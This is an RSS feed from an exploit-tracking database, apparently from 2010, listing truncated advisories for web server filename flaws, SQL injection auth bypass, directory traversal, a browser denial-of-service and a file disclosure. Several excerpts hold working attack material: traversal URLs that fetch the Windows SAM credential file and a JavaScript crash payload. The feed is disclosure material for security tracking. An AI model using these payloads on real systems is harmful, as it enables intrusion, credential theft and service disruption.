ExploitAlert Database - Exploit Database http://securityreason.com/exploit_alert ExploitAlert Database monitors new exploits and helps you to keep track of the latest exploits, 0days, proof of concepts. en-us Copyright © SecurityReason. All Rights Reserved. Tue, 09 Feb 2010 22:36:37 +0100 ExploitAlert Database - Exploit Database http://securityreason.com/exploit_alert http://securityreason.com/gfx/logo.gif 70 144 ExploitAlert Database - SecurityReason.com exploit_databasehttp://feedburner.google.com Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers http://feedproxy.google.com/~r/exploit_database/~3/27DZW7yigLs/7780 http://securityreason.com/exploitalert/7780 Tue, 09 Feb 2010 18:48:52 +0100 8.1. *Nginx Web Server*<br /> <br /> The following configuration snippet for Nginx Web Server will process<br /> any file with an extension of '.phtml' or '.php' by passing it to<br /> another service running locally on port 8080 for processing. It will<br /> deny requests for files beginning with '.ht' and the directory<br /> 'longfoldername'.<br /> <br /> /-----<br /> location ~ \.php$ {<br /> proxy_pass http://127.0.0.1:8080;<br /> }<br /> <br /> location ~ \.phtml$ {<br /> <br>... <p><a href="http://feedads.g.doubleclick.net/~a/sE2Z1U-DRJjzN5CEpgkwe1k9Dzk/0/da"><img src="http://feedads.g.doubleclick.net/~a/sE2Z1U-DRJjzN5CEpgkwe1k9Dzk/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/sE2Z1U-DRJjzN5CEpgkwe1k9Dzk/1/da"><img src="http://feedads.g.doubleclick.net/~a/sE2Z1U-DRJjzN5CEpgkwe1k9Dzk/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/exploit_database/~4/27DZW7yigLs" height="1" width="1"/> http://securityreason.com/exploitalert/7780 Newsletter Tailor Database Backup Dump Vulnerability http://feedproxy.google.com/~r/exploit_database/~3/vcHmB7IQV78/7779 http://securityreason.com/exploitalert/7779 Tue, 09 Feb 2010 18:42:53 +0100 ===========================================================================<br /> ===<br /> [&amp;#187;] ~ Note : [ Tribute to the martyrs of Gaza . ]<br /> ===========================================================================<br /> ===<br /> [&amp;#187;] Newsletter Tailor Database Backup Dump Vulnerability<br /> ===========================================================================<br /> ===<br /> <br /> [&amp;#187;] Script: [ Newsletter Tailor ]<br>... <p><a href="http://feedads.g.doubleclick.net/~a/9cud7g_OWHaZv8U5yAOsJSME8vY/0/da"><img src="http://feedads.g.doubleclick.net/~a/9cud7g_OWHaZv8U5yAOsJSME8vY/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/9cud7g_OWHaZv8U5yAOsJSME8vY/1/da"><img src="http://feedads.g.doubleclick.net/~a/9cud7g_OWHaZv8U5yAOsJSME8vY/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/exploit_database/~4/vcHmB7IQV78" height="1" width="1"/> http://securityreason.com/exploitalert/7779 Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability http://feedproxy.google.com/~r/exploit_database/~3/OMhSohJCai4/7778 http://securityreason.com/exploitalert/7778 Tue, 09 Feb 2010 18:42:11 +0100 # SecurityReason Note :<br /> #<br /> # Vulnerable Code in /admin/auth.inc.php :<br /> #<br /> # $admin=$mydb-&gt;query(&quot;select * from `admin`&quot;); <br /> #$fetch=$mydb-&gt;fetchrows($admin);<br /> # $pass=$fetch[&quot;password&quot;];<br /> # if ($pass=$password) {<br /> # session_destroy();<br /> # session_start();<br /> # $_SESSION['adminname']=&quot;1&quot;;<br /> # define (&quot;_VALID_USER&quot;,&quot;1&quot;); <br /> #<br /> # As we can see we have if ($pass=$passw<br>... <p><a href="http://feedads.g.doubleclick.net/~a/JCSF1-UJ1RFiiqPQgwP72fRggKg/0/da"><img src="http://feedads.g.doubleclick.net/~a/JCSF1-UJ1RFiiqPQgwP72fRggKg/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/JCSF1-UJ1RFiiqPQgwP72fRggKg/1/da"><img src="http://feedads.g.doubleclick.net/~a/JCSF1-UJ1RFiiqPQgwP72fRggKg/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/exploit_database/~4/OMhSohJCai4" height="1" width="1"/> http://securityreason.com/exploitalert/7778 GeFest Web HomeServer v1.0 Remote Directory Traversal Vulnerability http://feedproxy.google.com/~r/exploit_database/~3/W8HxagfTeBk/7777 http://securityreason.com/exploitalert/7777 Mon, 08 Feb 2010 20:28:02 +0100 By default, the utility runs as an application (and it's very likely that<br /> people will run this with administrator privileges)<br /> The discovered vulnerability allows an attacker to access files outside of<br /> the web application root.<br /> <br /> PoC :<br /> http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\calc.exe<br /> http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\config\sam<br /> http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32<br /> http://192.168.1.200<br>... <p><a href="http://feedads.g.doubleclick.net/~a/nDevegaQqS2uaaWsX7mjUrqetYM/0/da"><img src="http://feedads.g.doubleclick.net/~a/nDevegaQqS2uaaWsX7mjUrqetYM/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/nDevegaQqS2uaaWsX7mjUrqetYM/1/da"><img src="http://feedads.g.doubleclick.net/~a/nDevegaQqS2uaaWsX7mjUrqetYM/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/exploit_database/~4/W8HxagfTeBk" height="1" width="1"/> http://securityreason.com/exploitalert/7777 Safari 4.0.4, Firefox 3.5.6, SeaMonkey 2.0.1 Remote Denial of Service (With Possible Memory Corruption With OOM) http://feedproxy.google.com/~r/exploit_database/~3/MBu56K7rCY8/7776 http://securityreason.com/exploitalert/7776 Mon, 08 Feb 2010 14:05:05 +0100 &lt;!--<br /> Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With<br /> OOM)<br /> <br /> Firefox 3.5.6<br /> Safari 4.0.4<br /> SeaMonkey 2.0.1<br /> <br /> Author : 599eme Man<br /> Contact : flouf@live.fr<br /> <br /> --&gt;<br /> <br /> &lt;body onload=&quot;javascript:DoS();&quot;&gt;&lt;/body&gt;<br /> <br /> &lt;script&gt;<br /> <br /> function DoS() {<br /> <br /> var buffer = 'A';<br /> for (i =0;i&lt;150;i++) {<br /> buffer+=buffer+'A'<br>... <p><a href="http://feedads.g.doubleclick.net/~a/xSY3SL39tmIZbDDNOdMfqq_6Mq0/0/da"><img src="http://feedads.g.doubleclick.net/~a/xSY3SL39tmIZbDDNOdMfqq_6Mq0/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/xSY3SL39tmIZbDDNOdMfqq_6Mq0/1/da"><img src="http://feedads.g.doubleclick.net/~a/xSY3SL39tmIZbDDNOdMfqq_6Mq0/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/exploit_database/~4/MBu56K7rCY8" height="1" width="1"/> http://securityreason.com/exploitalert/7776 Mongoose Space Character Remote File Disclosure Vulnerability http://feedproxy.google.com/~r/exploit_database/~3/oPya8H2HrJg/7775 http://securityreason.com/exploitalert/7775 Mon, 08 Feb 2010 13:55:12 +0100 #################################################################<br /> # Securitylab.ir<br /> #################################################################<br /> # Application Info:<br /> # Name: Mongoose<br /> # Version: 2.8<br /> # Vendor: http://code.google.com/p/mongoose<br /> #################################################################<br /> # Vulnerability Info:<br /> # Type: Remote Source Disclosure<br /> # Risk: Medium<br /> ##########################################<br>... <p><a href="http://feedads.g.doubleclick.net/~a/nl36a6iFojy_oyxlDp4na6ug-iQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/nl36a6iFojy_oyxlDp4na6ug-iQ/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/nl36a6iFojy_oyxlDp4na6ug-iQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/nl36a6iFojy_oyxlDp4na6ug-iQ/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/exploit_database/~4/oPya8H2HrJg" height="1" width="1"/> http://securityreason.com/exploitalert/7775